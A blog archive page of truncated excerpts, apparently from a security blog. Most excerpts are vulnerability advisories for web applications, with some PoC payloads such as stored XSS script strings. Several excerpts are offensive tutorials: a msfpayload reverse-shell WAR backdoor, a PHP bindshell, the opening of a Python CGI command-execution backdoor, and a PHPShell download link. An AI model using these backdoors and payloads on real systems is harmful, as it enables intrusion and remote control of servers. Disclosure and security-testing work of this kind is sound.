Security Advisory FileRun: Blind SQL Injection Vulnerability We discovered a vulnerability during a pentest in a file sharing web application named FileRun. It allows us to access files anywhere through self-hosted secure cloud storage, with backup and sharing for photos, videos, files and more. The Vulnerability The vulnerability was discovered after authentication. After we logged in
Web Security NetGain Enterprise Manager: Authentication Bypass / Local File Inclusion We discovered a vulnerability on NetGain Enterprise Manager (ver. 7.2.647) during a pentest. We believe that this vulnerability is quite rare and worth sharing. Local File Inclusion Normal Request: POST /u/jsp/log/download_do.jsp HTTP/1.1 Host: 192.168.0.21:8081 User-Agent: Mozilla/
Security Advisory WordPress: Multiple Vulnerabilities in Simple Login Log Plugin We discovered a vulnerability in a WordPress plugin called Simple Login Log Plugin. Vulnerability: Authenticated Blind SQL Injection, Source IP Address Manipulation Affected Version: 1.1.1 (lower versions may be affected as well) Patched Version: Not available yet (vendor already contacted but no response) Blind SQL Injection =================== Affected URL:
Security Advisory NetGain Enterprise Manager: 'Ping' Command Injection We discovered a vulnerability on NetGain Enterprise Manager (ver. 7.2.562) during a pentest. We believe that this vulnerability is quite rare and worth sharing. Description: Command injection is an attack in which the purpose is execution of arbitrary commands on the host operating system via a vulnerable
Security Advisory WordPress Profile Builder Plugin: Stored XSS A simple stored cross-site scripting (XSS) vulnerability was found in WordPress Profile Builder Plugin version 5.2.7 and below. This is just a PoC example, just fill in the minimum password length field with [code]8″><script>alert(1)</script>[/code] [https://i2.wp.com/blog.
Security Advisory Centreon Enterprise Server 2.3.3 - 2.3.9-4: Blind SQL Injection We discovered the vulnerability while we were looking for alternative network monitoring software. We know and love Nagios [http://www.nagios.org], and Centreon as well, which provides a very nice interface for Nagios. Centreon provides nice features and ease of use when you’re dealing with network
Security Advisory Trend Micro Control Manager: SQL Injection Vulnerability Trend Micro Control Manager prior to version 5.5 build 1823 (English and Japanese version) and version 6 build 1449 (English version only) are susceptible to SQL Injection. The application does not properly filter user-supplied input. The successful exploitation of this vulnerability could potentially result in arbitrary SQL command input
Security Advisory webERP: SQL Injection webERP (ver. 4.08.4) is a mature open-source ERP system providing best practice, multi-user business administration and accounting tools over the web. The vulnerability we discovered sits in the WO (work order) parameter, file WorkOrderEntry.php in the Manufacturing menu.
Security Advisory Trend Micro InterScan Messaging Security Suite: Multiple Vulnerabilities We discovered that Trend Micro InterScan Messaging Security Suite is vulnerable to Cross-site Scripting and Cross-site Request Forgery. Proof of Concept The proofs of concept for the vulnerabilities are as follows: Cross-site Scripting (CVE-2012-2995) (CWE-79) Persistent/Stored XSS hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"<script&
Security Advisory gtAkademik Gamatechno: SQL Injection and Persistent XSS We discovered that the gtAkademik Gamatechno web application is susceptible to SQL Injection and Cross-site Scripting (XSS). Stored/Persistent XSS The web application allows an attacker to inject XSS script inside the database (stored), because there is no sanitization process. There are 2 modules affected by XSS: Message Module and Update
Security Advisory Hexamail Server: Persistent XSS Vulnerability Hexamail Server version 4.4.5 or below is vulnerable to persistent cross-site scripting (XSS) via HTML email. Vulnerability Description Hexamail Server suffers from a persistent XSS vulnerability in the mail body, allowing a malicious user to execute scripts in a victim’s browser to hijack user sessions, redirect users, and or
Tutorials Create a WAR backdoor with Metasploit Facing a Tomcat server.. and need to upload a WAR backdoor…?? Well… we can create a WAR backdoor very easily with Metasploit. OK, follow these steps: 1. Creating the backdoor. dudul@banget:~$ msfpayload linux/x86/shell_reverse_tcp LHOST=172.16.96.1 W > dudul.war Created
Tutorials CGI Backdoor for Linux with Python #!/usr/bin/env python # Info : Linux based CGI backdoor with python # author: otoy # date : 0x102010 import cgi,os,re,sys form = cgi.FieldStorage() cmd = form.getvalue('cmd', '') osexe = os.popen(cmd) dirt = os.getcwd()+'/' prognm = sys.argv[0].strip() progfl = re.findall(dirt+'
Web Security Web Links Gatherer (ver 2) By using Beautiful Soup [http://www.crummy.com/software/BeautifulSoup/], we can change the code shown in the previous post to the code below… and it even works much better… just by changing the regex function, it returns a better result : #!/usr/bin/python # otoy -- https://otoyrood.wordpress.
Tutorials Web Links Gatherer with Python This simple program is used to collect the links found on a web page; it can also be developed into a crawler.. #!/usr/bin/python #info: program to get information about the links # found in a web page # # otoy(https://otoyrood.wordpress.com) # 0x102010 from urllib import urlopen import re,sys peng = '
Web Security How to: SQLMap (dump and destroy) SQLMap is a tool that automates the exploitation of SQL injection vulnerabilities, and it is very popular for that purpose. While most web hacking enthusiasts know this tool for gathering information and retrieving table information, I will try to share some information about the power of SQLMap
Web Security OWASP ModSecurity Core Rule Set ModSecurity is a good starting point to secure your web site. OWASP provides the core rule set (CRS) of ModSecurity rules against the most critical web application attacks. From OWASP: > ModSecurity [http://www.modsecurity.org/] is an Apache web server module that provides a web application firewall engine. The
Web Security Creating a PHP bindshell (backdoor) with Metasploit Want to create a PHP bindshell easily..?? Metasploit is a very powerful tool, including when it comes to creating a PHP bindshell. Here are the easy steps: [+] Create the bindshell. # msfpayload php/bind_php LPORT=55521 R > kutu.php NOTE: The command above will create a PHP script (kutu.php), which serves to create
Web Security Andiparos Andiparos [http://code.google.com/p/andiparos/] is a fork of Paros Proxy [http://www.parosproxy.org/]. Like Netsparker [http://otoyrood.wordpress.com/2010/08/05/netsparker/], this tool is intended for web application security testing, and it is open source. The tool has several features:
Web Security Netsparker Netsparker [https://www.mavitunasecurity.com/netsparker/] is a web application security scanner tool that can help you search for security holes in a website. The advantage of this program, made by Mavituna Security [https://www.mavitunasecurity.com], is that it can test the errors (bugs) it finds,
Web Security DVWA: Damn Vulnerable Web App DVWA [http://www.dvwa.co.uk/] is an application intended for security professionals to test the skills they have. DVWA [http://www.dvwa.co.uk/] is also suitable for those who want to learn several web-hacking techniques against PHP/MySQL applications, such as SQL injection, Remote Command Execution, etc. DVWA
Web Security PHPIDS Are you the owner/programmer of a PHP-based website, and not sure about the security of your site..?? PHPIDS [https://php-ids.org/] can be a fairly effective solution for preventing a number of hacking attempts against PHP-based websites. Here are some of the attacks that can be detected and prevented by PHPIDS [https:
Web Security PHPJackal Often play with PHPShells…?? PHPJackal [http://h.ackerz.com/index.php?p=/projects] is one PHPShell worth trying. This PHPShell has several interesting functions, including: * Hash Crackers * Network Scanner * WebProxy * etc. Download link [https://h.ackerz.com/download.php?file=PHPJackal.php.gz]. Mirror [https://packetstormsecurity.